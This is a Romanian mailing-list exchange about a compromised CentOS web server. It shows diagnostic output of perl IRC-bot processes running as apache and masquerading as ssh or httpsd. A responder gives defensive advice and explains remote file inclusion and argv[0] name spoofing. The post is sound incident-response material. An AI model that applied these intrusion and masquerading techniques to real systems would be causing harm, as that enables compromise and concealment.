Mihai Voica wrote:
Sorry pt wrap dar am dat paste. Imi poate da cineva o ideea de unde e
chestia asta si cum o pot remedia fara reinstall ? Serverul a fost
instalat de altcineva, teoretic doar httpd e serviciu public, se pare
ca pe acolo e o buba. Distro centOS 4.6
[EMAIL PROTECTED] netstat -anput
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address
State PID/Program name
tcp 0 0 0.0.0.0:21 0.0.0.0:*
LISTEN 11437/vsftpd
tcp 0 0 127.0.0.1:25 0.0.0.0:*
LISTEN 11453/sendmail: acc
tcp 0 0 192.168.100.10:55031 69.42.218.68:6667
ESTABLISHED 5763/ssh
tcp 0 0 192.168.100.10:39788 69.42.218.68:6667
ESTABLISHED 5660/ssh
tcp 0 0 :::80 :::*
LISTEN 5660/ssh
tcp 0 0 :::22
Frumos. Eu as incepe prin a studia logurile de acces. Undeva o sa ai
probabil ceva la modul de "=http://blablabla". Adica ai intr-un script
(ma repet, probabil) un remote file inclusion, ceea ce inseamna ca ala
accepta ca parametru orice iar cum php e baiat destept, iti deschide
fisiere, pagini web & so on. Rezolva problema asta si asteapta sa mai
apara altele (e stiut ca dupa ce rezolvi o problema apar 100).
(vezi ssh pe port 80 si conexiunile established)
[EMAIL PROTECTED] ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 1692 612 ? Ss Jan18 0:00 init [3]
apache 5656 0.0 0.0 0 0 ? Z 03:43 0:00 [sh] <defunct>
apache 5660 99.9 0.1 4948 3012 ? R 03:43 431:51 ssh
apache 5759 0.0 0.0 0 0 ? Z 03:51 0:00 [sh] <defunct>
apache 5763 99.9 0.1 4944 3008 ? R 03:51 423:32 ssh
root 11415 0.0 0.0 1596 544 ? Ss Jan18 0:00 syslogd -m 0
root 11425 0.0 0.0 4064 1140 ? Ss Jan18 0:00 /usr/sbin/sshd
root 11437 0.0 0.0 3780 1012 ? S Jan18 0:00 /usr/sbin/vsftpd
/etc/vsftpd/vsftpd.conf
root 11453 0.0 0.0 7340 1824 ? Ss Jan18 0:00 sendmail:
accepting connections
smmsp 11462 0.0 0.0 6488 1636 ? Ss Jan18 0:00 sendmail: Queue
[EMAIL PROTECTED]:00:00 for /var/spool/clientmqueue
root 11480 0.0 0.3 19748 6372 ? Ss Jan18 0:00 /usr/sbin/httpd
apache 11487 0.0 0.2 19888 4940 ? S Jan18 0:00 /usr/sbin/httpd
apache 11488 0.0 0.2 19992 5324 ? S Jan18 0:00 /usr/sbin/httpd
apache 11489 0.0 0.2 19996 5180 ? S Jan18 0:00 /usr/sbin/httpd
apache 11490 0.0 0.2 19888 4940 ? S Jan18 0:00 /usr/sbin/httpd
apache 11491 0.0 0.2 19868 4632 ? S Jan18 0:00 /usr/sbin/httpd
apache 11492 0.0 0.2 19864 4996 ? S Jan18 0:00 /usr/sbin/httpd
apache 11493 0.0 0.2 20000 5284 ? S Jan18 0:00 /usr/sbin/httpd
apache 11494 0.0 0.2 19888 4624 ? S Jan18 0:00 /usr/sbin/httpd
apache 22409 0.0 0.1 19748 3712 ? S 10:20 0:00 /usr/sbin/httpd
root 23993 0.0 0.0 1856 308 ? Ss 10:26 0:00 vzctl: pts/0
root 23994 0.0 0.0 2216 1276 pts/0 Ss 10:26 0:00 -bash
root 25831 0.0 0.0 2372 756 pts/0 R+ 10:55 0:00 ps aux
apache 30358 0.0 0.2 19888 4612 ? S 01:05 0:00 /usr/sbin/httpd
Este bine ca procesele infiltrate ruleaza ca apache. Asta inseamna ca
cel mai probabil nu a fost compromis tot sistemul ci doar userul de apache.
Daca e asa vezi pasul de mai sus si pe urma verifica toate directoarele
in care are acces de scriere userul apache. Cel mai probabil ceea ce
cauti va fi in /tmp sau /var/tmp (la -la is your friend, fi atent la
directoare de genul " "(spatiu) "..." etc.)
(vezi cele 2 procese de 99%)
[EMAIL PROTECTED] top -b -n1
top - 11:03:12 up 15:50, 0 users, load average: 2.00, 2.00, 2.00
Tasks: 24 total, 3 running, 19 sleeping, 0 stopped, 2 zombie
Cpu(s): 10.9% us, 1.5% sy, 0.0% ni, 87.6% id, 0.1% wa, 0.0% hi, 0.0% si
Mem: 2067756k total, 2007924k used, 59832k free, 211024k buffers
Swap: 2031608k total, 72k used, 2031536k free, 825952k cached
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
5660 apache 25 0 4948 3012 1244 R 99.6 0.1 439:43.42 perl
5763 apache 25 0 4944 3008 1248 R 97.6 0.1 431:24.66 perl
1 root 15 0 1692 612 528 S 0.0 0.0 0:00.10 init
5656 apache 16 0 0 0 0 Z 0.0 0.0 0:00.00 sh <defunct>
5759 apache 16 0 0 0 0 Z 0.0 0.0 0:00.00 sh <defunct>
11415 root 23 0 1596 544 456 S 0.0 0.0 0:00.02 syslogd
11425 root 20 0 4064 1140 836 S 0.0 0.1 0:00.06 sshd
11437 root 18 0 3780 1012 772 S 0.0 0.0 0:00.00 vsftpd
11453 root 18 0 7340 1824 864 S 0.0 0.1 0:00.01 sendmail
11462 smmsp 15 0 6488 1636 820 S 0.0 0.1 0:00.00 sendmail
11480 root 18 0 19748 6372 3960 S 0.0 0.3 0:00.07 httpd
11487 apache 15 0 19888 4940 2352 S 0.0 0.2 0:00.15 httpd
11488 apache 15 0 19992 5324 2676 S 0.0 0.3 0:00.13 httpd
11489 apache 15 0 19996 5180 2544 S 0.0 0.3 0:00.10 httpd
11490 apache 15 0 19888 4940 2352 S 0.0 0.2 0:00.11 httpd
11491 apache 18 0 19868 4632 2040 S 0.0 0.2 0:00.11 httpd
11492 apache 18 0 19864 4996 2384 S 0.0 0.2 0:00.14 httpd
11493 apache 15 0 20000 5284 2624 S 0.0 0.3 0:00.14 httpd
11494 apache 18 0 19888 4624 2056 S 0.0 0.2 0:00.12 httpd
22409 apache 19 0 19748 3712 1260 S 0.0 0.2 0:00.00 httpd
23993 root 15 0 1856 308 208 S 0.0 0.0 0:00.19 vzctl
23994 root 16 0 2216 1276 1052 S 0.0 0.1 0:00.12 bash
26044 root 15 0 1944 856 684 R 0.0 0.0 0:00.00 top
30358 apache 16 0 19888 4612 2036 S 0.0 0.2 0:00.02 httpd
(vezi primele 2 procese)
Am incercat tot ce am putut fara reinstall (updates, audit), dar
serverul web trebuia sa fie rapid up asa ca i-am dat drumul din nou
urmand sa fac investigatii a doua zi
A doua zi ... din nou:
[EMAIL PROTECTED] ~]# netstat -anput
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address
State PID/Program name
tcp 0 0 0.0.0.0:21 0.0.0.0:*
LISTEN 11418/vsftpd
tcp 0 0 127.0.0.1:25 0.0.0.0:*
LISTEN 11434/sendmail: acc
tcp 0 0 192.168.100.10:43745 64.89.27.36:36969
ESTABLISHED 23626/httpsd -i eth
tcp 0 0 :::80 :::*
LISTEN 11454/httpd
tcp 0 0 ::ffff:192.168.100.10:80 ::ffff:192.168.100.5:48596
TIME_WAIT -
Merry Christmas, you got owned a second time. Jucaria asta este un pic
mai desteapta. In C, se poate altera numele fisierului prin modificarea
ARGV[0] (si in alte limbaje, stiu, dar psybnc-urile sau te miri ce pt
irc in general sunt scrise in C).
(vezi httpsd )
[EMAIL PROTECTED] ~]# ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.3 1704 608 ? Ss Jan19 0:00 init [3]
root 11408 0.0 0.2 1608 528 ? Ss Jan19 0:00 syslogd -m 0
root 11418 0.0 0.5 3812 1000 ? S Jan19 0:00 /usr/sbin/vsftpd
/etc/vsftpd/vsftpd.conf
root 11434 0.0 0.9 7380 1844 ? Ss Jan19 0:00 sendmail:
accepting connections
smmsp 11443 0.0 0.8 6528 1644 ? Ss Jan19 0:00 sendmail: Queue
[EMAIL PROTECTED]:00:00 for /var/spool/clientmqueue
root 11454 0.0 3.2 19688 6328 ? Ss Jan19 0:00 /usr/sbin/httpd
root 11463 0.0 0.4 2492 904 ? Ss Jan19 0:00 crond
apache 23626 99.9 1.2 5220 2520 ? R 10:04 15:00 /usr/sbin/httpsd
-i eth0
apache 23640 0.0 2.2 19784 4412 ? S 10:04 0:00 /usr/sbin/httpd
apache 23641 0.0 2.3 19820 4592 ? S 10:04 0:00 /usr/sbin/httpd
apache 23642 0.0 2.2 19784 4404 ? S 10:04 0:00 /usr/sbin/httpd
apache 23645 0.0 2.2 19784 4384 ? S 10:04 0:00 /usr/sbin/httpd
apache 23646 0.0 2.2 19784 4396 ? S 10:04 0:00 /usr/sbin/httpd
apache 23647 0.0 2.2 19792 4404 ? S 10:04 0:00 /usr/sbin/httpd
apache 23648 0.0 2.2 19784 4384 ? S 10:04 0:00 /usr/sbin/httpd
root 24563 0.0 0.2 1852 424 ? Ss 10:11 0:00 vzctl: pts/0
root 24564 0.0 0.6 2228 1292 pts/0 Ss 10:11 0:00 -bash
root 26192 0.0 0.3 2388 776 pts/0 R+ 10:19 0:00 ps aux
( nu exista fisierul /usr/sbin/httpsd )
[EMAIL PROTECTED] ~]# top -b -n1
top - 10:20:39 up 1 day, 20:22, 0 users, load average: 1.00, 1.00, 1.04
Tasks: 18 total, 2 running, 16 sleeping, 0 stopped, 0 zombie
Cpu(s): 4.2% us, 0.7% sy, 0.0% ni, 95.1% id, 0.0% wa, 0.0% hi, 0.0% si
Mem: 196608k total, 37300k used, 159308k free, 0k buffers
Swap: 0k total, 0k used, 0k free, 0k cached
PID USER PR NI %CPU TIME+ %MEM VIRT RES SHR S COMMAND
23626 apache 25 0 100 16:04.06 1.3 5220 2520 576 R perl
1 root 18 0 0 0:00.05 0.3 1704 608 524 S init
11408 root 15 0 0 0:00.01 0.3 1608 528 440 S syslogd
11418 root 18 0 0 0:00.00 0.5 3812 1000 772 S vsftpd
11434 root 18 0 0 0:00.04 0.9 7380 1844 872 S sendmail
11443 smmsp 18 0 0 0:00.01 0.8 6528 1644 828 S sendmail
11454 root 18 0 0 0:00.22 3.2 19688 6328 3928 S httpd
11463 root 23 0 0 0:00.00 0.5 2492 904 524 S crond
23640 apache 18 0 0 0:00.00 2.2 19784 4412 1900 S httpd
23641 apache 19 0 0 0:00.00 2.3 19820 4592 2036 S httpd
23642 apache 18 0 0 0:00.00 2.2 19784 4404 1884 S httpd
23645 apache 19 0 0 0:00.00 2.2 19784 4384 1872 S httpd
23646 apache 15 0 0 0:00.00 2.2 19784 4396 1872 S httpd
23647 apache 18 0 0 0:00.02 2.2 19792 4404 1892 S httpd
23648 apache 15 0 0 0:00.00 2.2 19784 4384 1872 S httpd
24563 root 15 0 0 0:00.01 0.2 1852 424 316 S vzctl
24564 root 15 0 0 0:00.04 0.7 2228 1292 1068 S bash
26292 root 15 0 0 0:00.00 0.4 1960 868 696 R top
Cunoaste cineva cum s-a putut face asta si cum remediez ?
Multumesc anticipat.
Ma repet, studiaza logurile si cauta ce am scris mai sus.
Salut,
Radu Oprisan
_______________________________________________
RLUG mailing list
RLUG@lists.lug.ro
http://lists.lug.ro/mailman/listinfo/rlug